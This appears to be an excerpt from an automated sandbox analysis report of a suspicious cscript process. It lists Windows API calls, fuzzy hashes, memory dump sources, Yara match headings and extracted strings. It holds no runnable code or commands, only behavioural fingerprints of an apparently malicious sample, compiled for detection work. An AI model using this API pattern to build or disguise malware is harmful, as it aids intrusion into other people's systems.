                                                                                                                                      • Opcode ID: 2cacc0f4ccea31a1052237ee0ca1d9da7ada8226772c7f56bb74ee4e87413e16
                                                                                                                                      • Instruction ID: 42ac83b69df527b816fe16a1574e058d8f5596978ac7e409f1ed6b9ee3e5be56
                                                                                                                                      • Opcode Fuzzy Hash: 2cacc0f4ccea31a1052237ee0ca1d9da7ada8226772c7f56bb74ee4e87413e16
                                                                                                                                      • Instruction Fuzzy Hash: 9D018431AC02297BEB20AAA49C42FBE7B6D5F41F54F150119FF04BA1C1E794AA0546E6
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0219836A
                                                                                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0219838B
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1836367815-0
                                                                                                                                      • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                                                                                                      • Instruction ID: 502df0c219c49aca448a775a802fee93eb4cc2ad58a3548707043cc9684326ed
                                                                                                                                      • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                                                                                                      • Instruction Fuzzy Hash: 0B01A231AC02287BEB20A6949C42FBF776D5F41F50F150119FF04BA1C1E7E4AA064AF6
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0219AD62
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Load
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                      • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                      • Instruction ID: 3760fea96994f3814dec40f04a72b994ab1cf32ca75656f81dfffabf0b12728d
                                                                                                                                      • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                                      • Instruction Fuzzy Hash: 09011EB9D8020DBBDF10EAA4DD51FDDB7B99F54308F004595A90997240FB31EB18CB91
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 021AA734
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2186235152-0
                                                                                                                                      • Opcode ID: a7236efc08fb06a34230a110b35b3b9140f066148a669c418d0056759f92f0e4
                                                                                                                                      • Instruction ID: 8bb4891c48cc06b11d19a4f3fc43ce4f15a15d2c04e4226b948121b952bb02f0
                                                                                                                                      • Opcode Fuzzy Hash: a7236efc08fb06a34230a110b35b3b9140f066148a669c418d0056759f92f0e4
                                                                                                                                      • Instruction Fuzzy Hash: CA01A4B2214108AFCB58CF99DC80EEB37AEAF8C754F158258FA1DD7250C630E851CBA0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 021AA734
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2186235152-0
                                                                                                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                      • Instruction ID: 077ad060dbecf68a869931729b66f6022fe1b8733d6e335e6ed2e27990553ef1
                                                                                                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                      • Instruction Fuzzy Hash: 9401B2B2210108BFCB58DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0219F050,?,?,00000000), ref: 021A91EC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                      • Opcode ID: dfd687a368151b96c951bdfed8c57082f8c90fd7efff9cd705ea1fad239337be
                                                                                                                                      • Instruction ID: d15ea77744c3f4331ff381cae47ec1e1376d94210c6f2e0cf6091630b15099a6
                                                                                                                                      • Opcode Fuzzy Hash: dfd687a368151b96c951bdfed8c57082f8c90fd7efff9cd705ea1fad239337be
                                                                                                                                      • Instruction Fuzzy Hash: 27E06D3B3802043AE22065A9AC02FA7B29C8B91B61F140026FA0DEA2C1DA96F40146E5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(021A4536,?,021A4CAF,021A4CAF,?,021A4536,?,?,?,?,?,00000000,00000000,?), ref: 021AA65D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                      • Instruction ID: 509e88caf8de08644f7917bd3c10ec7d8c49013741958ee34c6e3f459e883787
                                                                                                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                      • Instruction Fuzzy Hash: F6E012B6200208ABDB18EF99CC40EAB77ADEF88654F118558BA085B241C630F910CAB0
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0219F1D2,0219F1D2,?,00000000,?,?), ref: 021AA800
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3899507212-0
                                                                                                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                      • Instruction ID: 70ef9be1e09f62716521cbcbb9a0ff213e24a6491d4945acb3d93f116688ab0b
                                                                                                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                      • Instruction Fuzzy Hash: 82E01AB52002086BDB14DF59CC84EEB37ADEF88650F118154BA0857241CA30E8108BF5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,02198D14,?), ref: 0219F6FB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorMode
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                      • Opcode ID: 2574f8edebe7e896112ff0d17bfdb10c2b50bc25d3e07dff3f9e9bb06ff21b86
                                                                                                                                      • Instruction ID: 0dffe6feafffd1673bb6f8f490d7f11c5e5020e649834bfb0887991160e36d8f
                                                                                                                                      • Opcode Fuzzy Hash: 2574f8edebe7e896112ff0d17bfdb10c2b50bc25d3e07dff3f9e9bb06ff21b86
                                                                                                                                      • Instruction Fuzzy Hash: 57D02BD46A834439FB51BA701C42F037E440B11600F194698A488E9083DD48D0054235
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,02198D14,?), ref: 0219F6FB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorMode
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                      • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                                                                      • Instruction ID: 9be4978c4ab368871f02ccd90846ad1e484a1fcddc3f5528a64052d34c0bdb31
                                                                                                                                      • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                                                                      • Instruction Fuzzy Hash: 10D05E756903083AEA10AAA49C12F2632895B44A04F590064F948D62C3EA94F00145A5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_4620000_cscript.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 261f6f762b3c1ab310820cb69fd91179cc3683ebb83951fe1302736cd47e1abd
                                                                                                                                      • Instruction ID: 6a7af9ce3e7304bfd26c95ee41338f2cab162563eb4e5e7dc4b633f2db49ff24
                                                                                                                                      • Opcode Fuzzy Hash: 261f6f762b3c1ab310820cb69fd91179cc3683ebb83951fe1302736cd47e1abd
                                                                                                                                      • Instruction Fuzzy Hash: A1B02B31C024C0C6FF00EF200B08707394077D0304F11C451D2030340E4738D490F132
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $: $: $Host$Host:
                                                                                                                                      • API String ID: 0-1593100478
                                                                                                                                      • Opcode ID: 46fbb59e8048c8ef8a73020c6f50dfb66cbad09ea12026dc58818602753fcb4e
                                                                                                                                      • Instruction ID: 43602b14e151f1ac662986d7e24c6b339131d0b5e4884ea2f2c7e3c92b177b45
                                                                                                                                      • Opcode Fuzzy Hash: 46fbb59e8048c8ef8a73020c6f50dfb66cbad09ea12026dc58818602753fcb4e
                                                                                                                                      • Instruction Fuzzy Hash: 6D212676544284AED701CEA4CC90BEBB77CEF82314F0882AEEC499B186D775A505CBA5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14560546460.0000000002190000.00000040.80000000.00040000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_2190000_cscript.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: =$www.$www.
                                                                                                                                      • API String ID: 0-3343787489
                                                                                                                                      • Opcode ID: c75962fdb10161b431724b02babfd0e8281b4c148beca00741b216530b3a184e
                                                                                                                                      • Instruction ID: d5a7042bad7314810c2976252fc01dc0257522c9071571eb62663e5d44f33ebe
                                                                                                                                      • Opcode Fuzzy Hash: c75962fdb10161b431724b02babfd0e8281b4c148beca00741b216530b3a184e
                                                                                                                                      • Instruction Fuzzy Hash: 71C1F6B6984244AECB24DBB0CC91FEFB77EAF04704F044559E2595B182EB74A648CFD1
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 046C4460
                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 046C454D
                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 046C4592
                                                                                                                                      • Execute=1, xrefs: 046C451E
                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 046C4507
                                                                                                                                      • ExecuteOptions, xrefs: 046C44AB
                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 046C4530
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_4620000_cscript.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                      • Opcode ID: 894a37f7f262f1e9aab32aa1371a627757994ea5efcf63c06635f902cdfb27dd
                                                                                                                                      • Instruction ID: 47a237b38dfad1d18b38ced7f6f7c7e0276b8545f793e6b08b8d24a753de1f0b
                                                                                                                                      • Opcode Fuzzy Hash: 894a37f7f262f1e9aab32aa1371a627757994ea5efcf63c06635f902cdfb27dd
                                                                                                                                      • Instruction Fuzzy Hash: 1A51F771B002196AEF10BFA4DC99FF973A8EF18705F1405ADE505A7280FB70BE418E65
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.14563756602.0000000004620000.00000040.00001000.00020000.00000000.sdmp, Offset: 04620000, based on PE: true
                                                                                                                                      • Associated: 00000005.00000002.14563756602.0000000004749000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000005.00000002.14563756602.000000000474D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_4620000_cscript.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: $$@
                                                                                                                                      • API String ID: 0-1194432280
                                                                                                                                      • Opcode ID: ae3a1d7a3cd3e13d72134aa4833d697a494aa014715ea75c0c4ca5ccc9ef433f
                                                                                                                                      • Instruction ID: d0ffe21329dcb9bb58bffa856694c7895d924b34b235b391a473bc1be2e1bbd2
                                                                                                                                      • Opcode Fuzzy Hash: ae3a1d7a3cd3e13d72134aa4833d697a494aa014715ea75c0c4ca5ccc9ef433f
                                                                                                                                      • Instruction Fuzzy Hash: DF811AB1D002699BDB31CF54CC44BEEB7B8AB48714F0045EAE919B7250E770AE85CFA5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%